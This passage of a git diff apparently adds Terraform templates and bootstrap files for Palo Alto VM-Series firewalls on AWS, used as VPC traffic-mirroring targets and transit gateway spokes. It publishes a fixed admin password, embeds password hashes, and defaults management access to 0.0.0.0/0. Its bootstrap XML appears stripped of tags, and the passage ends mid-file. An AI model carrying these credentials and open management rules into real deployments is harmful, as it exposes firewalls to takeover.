+ protocol = "-1" + cidr_blocks = ["10.0.0.0/8", "192.168.0.0/16"] + + security_group_id = "${aws_security_group.server_sg.id}" +} + +resource "aws_security_group_rule" "allow_server_sg_egress" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.server_sg.id}" +} + +resource "aws_route" "vpc_spoke_route_1" { + route_table_id = "${aws_vpc.vpc_spoke.default_route_table_id}" + destination_cidr_block = "10.0.0.0/8" + transit_gateway_id = "${var.aws_tgw_id}" +} + +resource "aws_route" "vpc_spoke_route_2" { + route_table_id = "${aws_vpc.vpc_spoke.default_route_table_id}" + destination_cidr_block = "192.168.0.0/16" + transit_gateway_id = "${var.aws_tgw_id}" +} + +resource "aws_route" "vpc_spoke_route_3" { + route_table_id = "${aws_vpc.vpc_spoke.default_route_table_id}" + destination_cidr_block = "0.0.0.0/0" + transit_gateway_id = "${var.aws_tgw_id}" +} + +resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_spoke_attachment" { + vpc_id = "${aws_vpc.vpc_spoke.id}" + subnet_ids = ["${aws_subnet.primary.id}", "${aws_subnet.secondary.id}"] + transit_gateway_id = "${var.aws_tgw_id}" + transit_gateway_default_route_table_association = false + transit_gateway_default_route_table_propagation = false + + tags { + Name = "tgw_attachment_spoke_${var.vpc_spoke_cidr}" + } +} + +resource "aws_ec2_transit_gateway_route_table_association" "vpc_spoke_1" { + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}" + transit_gateway_route_table_id = "${var.aws_tgw_spoke_rtb_id}" +} + +resource "aws_ec2_transit_gateway_route_table_propagation" "route_table_propagation" { + transit_gateway_attachment_id = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}" + transit_gateway_route_table_id = "${var.aws_tgw_security_rtb_id}" +} + +//Server in subnet +data "aws_ami" "ubuntu" { + most_recent = true + + filter { + name = "name" + values = ["ubuntu/images/hvm-ssd/ubuntu-trusty-14.04-amd64-server-*"] + } + + filter { + name = "virtualization-type" + values = ["hvm"] + } + + owners = ["099720109477"] # Canonical +} + +resource "aws_instance" "web" { + ami = "${data.aws_ami.ubuntu.id}" + instance_type = "t3a.micro" + key_name = "${var.pemkey}" + subnet_id = "${aws_subnet.primary.id}" + private_ip = "${var.serverip}" + security_groups = ["${aws_security_group.server_sg.id}"] + + tags = { + Name = "${var.servername}" + } +} + +resource "aws_instance" "web2" { + ami = "${data.aws_ami.ubuntu.id}" + instance_type = "t3a.micro" + key_name = "${var.pemkey}" + subnet_id = "${aws_subnet.secondary.id}" + private_ip = "${var.server2ip}" + security_groups = ["${aws_security_group.server_sg.id}"] + + tags = { + Name = "${var.server2name}" + } +} + +//End Server +output "vpc_id" { + value = "${aws_vpc.vpc_spoke.id}" +} + +output "subnet_id" { + value = "${aws_subnet.primary.id}" +} diff --git a/aws/TGW-VPC-Mirroring/vpc_spokes.tf b/aws/TGW-VPC-Mirroring/vpc_spokes.tf new file mode 100644 index 00000000..d0e66637 --- /dev/null +++ b/aws/TGW-VPC-Mirroring/vpc_spokes.tf @@ -0,0 +1,31 @@ +module "spoke1" { + source = "./vpc_spoke/" + + pemkey = "${var.aws_key}" + serverip = "${var.spoke1_server}" + server2ip = "${var.spoke1_server2}" + servername = "spoke1-server1" + server2name = "spoke1-server2" + vpc_spoke_cidr = "${var.spoke1_cidr}" + vpc_spoke_subnet_cidr = "${var.spoke1_subnet}" + vpc_spoke_subnet2_cidr = "${var.spoke1_subnet2}" + aws_tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + aws_tgw_spoke_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}" + aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}" +} + +module "spoke2" { + source = "./vpc_spoke/" + + pemkey = "${var.aws_key}" + serverip = "${var.spoke2_server}" + server2ip = "${var.spoke2_server2}" + servername = "spoke2-server" + server2name = "spoke2-server2" + vpc_spoke_cidr = "${var.spoke2_cidr}" + vpc_spoke_subnet_cidr = "${var.spoke2_subnet}" + vpc_spoke_subnet2_cidr = "${var.spoke2_subnet2}" + aws_tgw_id = "${aws_ec2_transit_gateway.tgw.id}" + aws_tgw_spoke_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}" + aws_tgw_security_rtb_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}" +} diff --git a/aws/TGW-VPC/README.md b/aws/TGW-VPC/README.md index 985234d8..a0abade7 100644 --- a/aws/TGW-VPC/README.md +++ b/aws/TGW-VPC/README.md @@ -20,7 +20,7 @@ 3. Here is a link to setting up a creds file to access AWS: https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html 4. After deployment the firewall username and password are: - Username: paloalto + Username: admin Password: Pal0Alt0@123 ``` diff --git a/aws/TGW-VPC/vm-series/main.tf b/aws/TGW-VPC/vm-series/main.tf index 30f8cb7b..e519e14c 100644 --- a/aws/TGW-VPC/vm-series/main.tf +++ b/aws/TGW-VPC/vm-series/main.tf @@ -48,8 +48,7 @@ variable "license_type_map" { data "aws_ami" "panw_ngfw" { most_recent = true - include owners = [“aws-marketplace”] - + owners = ["aws-marketplace"] filter { name = "owner-alias" values = ["aws-marketplace"] diff --git a/aws/VPC_Mirror_Target/README.md b/aws/VPC_Mirror_Target/README.md new file mode 100644 index 00000000..69b1c1f2 --- /dev/null +++ b/aws/VPC_Mirror_Target/README.md @@ -0,0 +1,69 @@ +## 2 x VM-Series / NLB for VPC Mirror +Terraform creates 2 VM-Series firewalls that are targets of an internal load balancer ready to receive VXLAN traffic from a VPC Mirroring configuration. After deployment there are some steps that need to be done to setup VPC traffic Mirroring. Those are documenented in screen shots below. + +### Overview +* 1 x VPC +* 2 x VM-Series (Bundle2) +* 1 x NLB Internal Load Balancer listening on VXLAN UDP Port 4789 (NGFW 3 & 4 as targets) +* 2 x S3 Buckets for VM-Series + +This is picture of the deployed environment: + + +![deployment](https://user-images.githubusercontent.com/21991161/65703297-271e2700-e04a-11e9-9827-5512629c6db0.jpg) + + +### Prerequistes +1. Terraform +2. Access to AWS Console + +After deployment, the firewalls' username and password are: + * **Username:** admin + * **Password:** Pal0Alt0@123 + +### Deployment +1. Download the **TGW-VPC-Mirroring** repo to the machine running the build +2. In an editor, open **variables.tf** and set values for the following variables + +| Variable | Description | +| :------------- | :------------- | +| `aws_region` | AWS Region of Deployment| +| `aws_key` | Authentication key file for deployed VMs | +| `bootstrap_s3bucket3` | Universally unigue name for Boostrap S3 Bucket for NGFW3 | +| `bootstrap_s3bucket4` | Universally unigue name for Boostrap S3 Bucket for NGFW4 | +| + +3. Execute Terraform +``` +$ terraform init +$ terraform plan +$ terraform apply +``` + +5. After deployment an output with connection information will be displayed: +![Output](https://user-images.githubusercontent.com/21991161/65703240-12419380-e04a-11e9-9dc4-4a89231fc857.jpg) + +6. To configure VPC Mirroring first select VPC/Traffic Mirroring/Mirror Filter and Create a new traffic mirror filter + +![Mirrorfilterselection](https://user-images.githubusercontent.com/21991161/65637508-eb338500-dfa9-11e9-893b-1255ed2f7135.jpg)" width="350"> + + +7. Fill in the fields and click create +![MirrorFilterOptions](https://user-images.githubusercontent.com/21991161/65637506-eb338500-dfa9-11e9-9453-c9a32bf9f276.jpg) + +8. Next select VPC/Traffic Mirror/Mirror Targets and click Create a Mirror Target +![Mirrortargetselection](https://user-images.githubusercontent.com/21991161/65637512-ebcc1b80-dfa9-11e9-9d27-a50ac1698ad3.jpg) + + +9. Fill in the fields and click create +![MirrorTargetoptions](https://user-images.githubusercontent.com/21991161/65637511-eb338500-dfa9-11e9-82b4-65cedbdeea71.jpg) + +10. Select VPC/Traffic Mirror/Mirror Sessions and click Create a Mirror Session +![MirrorSessionSelection](https://user-images.githubusercontent.com/21991161/65637510-eb338500-dfa9-11e9-9966-b4f5d1b279ca.jpg) + +11. Fill in the fields and click create +![mirrorsessionoptions](https://user-images.githubusercontent.com/21991161/65637509-eb338500-dfa9-11e9-87c9-fdfdb3a6a738.jpg) + +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/aws/VPC_Mirror_Target/bootstrap3.tf b/aws/VPC_Mirror_Target/bootstrap3.tf new file mode 100644 index 00000000..b8ae9407 --- /dev/null +++ b/aws/VPC_Mirror_Target/bootstrap3.tf @@ -0,0 +1,97 @@ +# Create a BootStrap S3 Bucket + +resource "aws_s3_bucket" "bootstrap_bucket3" { + bucket = "${var.bootstrap_s3bucket3}" + acl = "private" + force_destroy = true + + tags { + Name = "bootstrap_bucket3" + } +} + +# Create Folders and Upload Bootstrap Files +resource "aws_s3_bucket_object" "bootstrap_xml3" { + bucket = "${aws_s3_bucket.bootstrap_bucket3.id}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap_files3/bootstrap.xml" +} + +resource "aws_s3_bucket_object" "init-cft_txt3" { + bucket = "${aws_s3_bucket.bootstrap_bucket3.id}" + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap_files3/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "software3" { + bucket = "${aws_s3_bucket.bootstrap_bucket3.id}" + acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "license3" { + bucket = "${aws_s3_bucket.bootstrap_bucket3.id}" + acl = "private" + key = "license/authcodes" + source = "bootstrap_files3/authcodes" +} + +resource "aws_s3_bucket_object" "content3" { + bucket = "${aws_s3_bucket.bootstrap_bucket3.id}" + acl = "private" + key = "content/" + source = "/dev/null" +} + +/* Roles, ACLs, Permissions, etc... */ + +resource "aws_iam_role" "bootstrap_role3" { + name = "ngfw_bootstrap_role3" + + assume_role_policy = < + + + + + $1$cweppdgb$pU2XxH3TD.QyD29.TXnVT. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$kouigbds$mrNbt/msQehCS55jxNnYa. + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + LB Healthcheck + + + + + + + + no + + + + + no + + + no + + + no + + + down + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + + + + + yes + yes + yes + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-1 + 18.224.86.63 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + 18.224.86.63 + 8.8.8.8 + 382932559738703 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + mirror + + + mirror + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + default + + + strict file blocking + + + default + + + strict + + + strict-1 + + + default + + + + + + + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + + no + + + + vxlan + + + any + + + any + + + any + + + any + + + any + + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + any + + + critical + + + any + + any + client + any + disable + + + + + + + any + + + high + + + any + + any + client + any + disable + + + + + + + any + + + medium + + + any + + any + client + any + disable + + + + + + + any + + + informational + + + any + + any + client + any + disable + + + + + + + any + + + low + + + any + + any + client + any + disable + + + + + + + any + + + critical + + + any + + any + server + any + disable + + + + + + + any + + + high + + + any + + any + server + any + disable + + + + + + + any + + + medium + + + any + + any + server + any + disable + + + + + + + any + + + informational + + + any + + any + server + any + disable + + + + + + + any + + + low + + + any + + any + server + any + disable + + + + + + + + + + + diff --git a/aws/VPC_Mirror_Target/bootstrap_files3/init-cfg.txt b/aws/VPC_Mirror_Target/bootstrap_files3/init-cfg.txt new file mode 100644 index 00000000..8d8c673c --- /dev/null +++ b/aws/VPC_Mirror_Target/bootstrap_files3/init-cfg.txt @@ -0,0 +1,19 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname= +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary=8.8.8.8 +dns-secondary= +vm-auth-key= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/VPC_Mirror_Target/bootstrap_files4/authcodes b/aws/VPC_Mirror_Target/bootstrap_files4/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/aws/VPC_Mirror_Target/bootstrap_files4/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/aws/VPC_Mirror_Target/bootstrap_files4/bootstrap.xml b/aws/VPC_Mirror_Target/bootstrap_files4/bootstrap.xml new file mode 100644 index 00000000..47244dd3 --- /dev/null +++ b/aws/VPC_Mirror_Target/bootstrap_files4/bootstrap.xml @@ -0,0 +1,1018 @@ + + + + + + $1$cweppdgb$pU2XxH3TD.QyD29.TXnVT. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$kouigbds$mrNbt/msQehCS55jxNnYa. + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + LB HealthCheck + + up + + + + + + + no + + + + + no + + + no + + + no + + + down + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + + + + + yes + yes + yes + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-1 + 18.224.86.63 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + 18.224.86.63 + 8.8.8.8 + 382932559738703 + mgmt-interface-swap + + + + + + + + + + + + + + + + + + + + + + + ethernet1/1 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + mirror + + + mirror + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + default + + + strict file blocking + + + default + + + strict + + + strict-1 + + + default + + + + + + + + + + + + + ethernet1/1 + + + + + untrust + + + trust + + + any + + + any + + any + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.1.45 + + ethernet1/1 + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.2.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.2.45 + + + + + + + ethernet1/2 + + + + + trust + + + trust + + + 10.0.0.0/8 + + + 10.0.0.0/8 + + any + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + + no + + + + vxlan + + + any + + + any + + + any + + + any + + + any + + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + + any + + + critical + + + any + + any + client + any + disable + + + + + + + any + + + high + + + any + + any + client + any + disable + + + + + + + any + + + medium + + + any + + any + client + any + disable + + + + + + + any + + + informational + + + any + + any + client + any + disable + + + + + + + any + + + low + + + any + + any + client + any + disable + + + + + + + any + + + critical + + + any + + any + server + any + disable + + + + + + + any + + + high + + + any + + any + server + any + disable + + + + + + + any + + + medium + + + any + + any + server + any + disable + + + + + + + any + + + informational + + + any + + any + server + any + disable + + + + + + + any + + + low + + + any + + any + server + any + disable + + + + + + + + + + + diff --git a/aws/VPC_Mirror_Target/bootstrap_files4/init-cfg.txt b/aws/VPC_Mirror_Target/bootstrap_files4/init-cfg.txt new file mode 100644 index 00000000..8d8c673c --- /dev/null +++ b/aws/VPC_Mirror_Target/bootstrap_files4/init-cfg.txt @@ -0,0 +1,19 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname= +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary=8.8.8.8 +dns-secondary= +vm-auth-key= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/VPC_Mirror_Target/nlb.tf b/aws/VPC_Mirror_Target/nlb.tf new file mode 100644 index 00000000..3835c45f --- /dev/null +++ b/aws/VPC_Mirror_Target/nlb.tf @@ -0,0 +1,39 @@ +resource "aws_lb" "mirror-lb" { + name = "mirror-lb-tf" + internal = true + load_balancer_type = "network" + subnets = ["${aws_subnet.vpc_mirror_pub_1.id}","${aws_subnet.vpc_mirror_pub_2.id}"] + + enable_deletion_protection = false + enable_cross_zone_load_balancing = true + tags = { + } +} +resource "aws_lb_target_group" "mirror-target" { + name = "mirror-target" + port = 4789 + protocol = "UDP" + vpc_id = "${aws_vpc.vpc_security.id}" + health_check { + port = 80 + protocol = "HTTP" + } +} +resource "aws_lb_listener" "mirror-listener" { + load_balancer_arn = "${aws_lb.mirror-lb.arn}" + port = "4789" + protocol = "UDP" + + default_action { + type = "forward" + target_group_arn = "${aws_lb_target_group.mirror-target.arn}" + } +} +resource "aws_lb_target_group_attachment" "mirror1" { + target_group_arn = "${aws_lb_target_group.mirror-target.arn}" + target_id = "${module.ngfw3.instanceid}" +} +resource "aws_lb_target_group_attachment" "mirror3" { + target_group_arn = "${aws_lb_target_group.mirror-target.arn}" + target_id = "${module.ngfw4.instanceid}" +} \ No newline at end of file diff --git a/aws/VPC_Mirror_Target/providers.tf b/aws/VPC_Mirror_Target/providers.tf new file mode 100644 index 00000000..af7b0ba3 --- /dev/null +++ b/aws/VPC_Mirror_Target/providers.tf @@ -0,0 +1,3 @@ +provider "aws" { + region = "${var.aws_region}" +} diff --git a/aws/VPC_Mirror_Target/variables.tf b/aws/VPC_Mirror_Target/variables.tf new file mode 100644 index 00000000..184e2854 --- /dev/null +++ b/aws/VPC_Mirror_Target/variables.tf @@ -0,0 +1,72 @@ +//This section should be verified and modified accordingly. + +variable aws_region { + description = "AWS Region for deployment" + default = "us-east-2" +} + +variable aws_key { + description = "aws_key" + default = "AWS-Ohio-Key" +} + +//Do not create these. The Terraform will do that. Just need to make secure +//the s3 bucket names are unique. + + +variable bootstrap_s3bucket3 { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "djs-tgw-bucket-blah-3" +} + +variable bootstrap_s3bucket4 { + description = "S3 Bucket Name used to Bootstrap the NGFWs" + default = "djs-tgw-bucket-blah-4" +} +//End of the section that MUST be modified to work +variable management_cidr { + description = "CIDR Address for Management Access" + default = "0.0.0.0/0" +} + +variable vpc_security_cidr { + description = "CIDR Address for Security VPC" + default = "192.168.0.0/16" +} + + +################# +# Mirror Subnets +################# +variable vpc_mirror_pub_1 { + description = "CIDR Address for Security VPC" + default = "192.168.51.0/24" +} + +variable fw_ip_subnet_pub_1 { + description = "CIDR Address for Security VPC" + default = "192.168.51.45" +} +variable fw_ip_subnet_mgmt_1 { + description = "CIDR Address for Security VPC" + default = "192.168.51.44" +} + +variable vpc_mirror_pub_2 { + description = "CIDR Address for Security VPC" + default = "192.168.61.0/24" +} + +variable fw_ip_subnet_mgmt_2 { + description = "CIDR Address for Security VPC" + default = "192.168.61.44" +} +variable fw_ip_subnet_pub_2 { + description = "CIDR Address for Security VPC" + default = "192.168.61.45" +} + +############# + + + diff --git a/aws/VPC_Mirror_Target/vm-series/main.tf b/aws/VPC_Mirror_Target/vm-series/main.tf new file mode 100644 index 00000000..8543edcd --- /dev/null +++ b/aws/VPC_Mirror_Target/vm-series/main.tf @@ -0,0 +1,154 @@ +variable name { + description = "firewall instance name" +} + +variable untrust_subnet_id {} +variable untrust_security_group_id {} +variable untrustfwip {} +variable mgmtfwip {} + + +variable management_subnet_id {} +variable management_security_group_id {} + +variable bootstrap_profile { + default = "" +} + +variable bootstrap_s3bucket {} + + +variable aws_region {} +variable aws_key {} + +variable instance_type { + default = "m5.xlarge" +} + +variable ngfw_license_type { + default = "payg2" +} + +variable ngfw_version { + default = "9.0" +} + +variable "license_type_map" { + type = "map" + + default = { + "byol" = "6njl1pau431dv1qxipg63mvah" + "payg1" = "6kxdw3bbmdeda3o6i1ggqt4km" + "payg2" = "806j2of0qy5osgjjixq9gqc6g" + } +} + +data "aws_ami" "panw_ngfw" { + most_recent = true + owners = ["aws-marketplace"] + + filter { + name = "owner-alias" + values = ["aws-marketplace"] + } + + filter { + name = "product-code" + values = ["${var.license_type_map[var.ngfw_license_type]}"] + } + + filter { + name = "name" + values = ["PA-VM-AWS-${var.ngfw_version}*"] + } +} + +data "aws_region" "current" { + name = "${var.aws_region}" +} + +resource "aws_network_interface" "eni-management" { + subnet_id = "${var.management_subnet_id}" + private_ips = ["${var.mgmtfwip}"] + security_groups = ["${var.management_security_group_id}"] + source_dest_check = true + + tags { + Name = "eni_${var.name}_management" + } +} + + + + + +resource "aws_eip" "eip-management" { + vpc = true + network_interface = "${aws_network_interface.eni-management.id}" + + tags { + Name = "eip_${var.name}_management" + } +} + +resource "aws_network_interface" "eni-untrust" { + subnet_id = "${var.untrust_subnet_id}" + private_ips = ["${var.untrustfwip}"] + security_groups = ["${var.untrust_security_group_id}"] + source_dest_check = false + + tags { + Name = "eni_${var.name}_untrust" + } +} + +resource "aws_eip" "eip-untrust" { + vpc = true + network_interface = "${aws_network_interface.eni-untrust.id}" + + tags { + Name = "eip_${var.name}_untrust" + } +} + +resource "aws_instance" "instance-ngfw" { + disable_api_termination = false + instance_initiated_shutdown_behavior = "stop" + iam_instance_profile = "${var.bootstrap_profile}" + user_data = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", var.bootstrap_s3bucket)))}" + + ebs_optimized = true + ami = "${data.aws_ami.panw_ngfw.image_id}" + instance_type = "${var.instance_type}" + key_name = "${var.aws_key}" + + monitoring = false + + network_interface { + device_index = 1 + network_interface_id = "${aws_network_interface.eni-management.id}" + } + + network_interface { + device_index = 0 + network_interface_id = 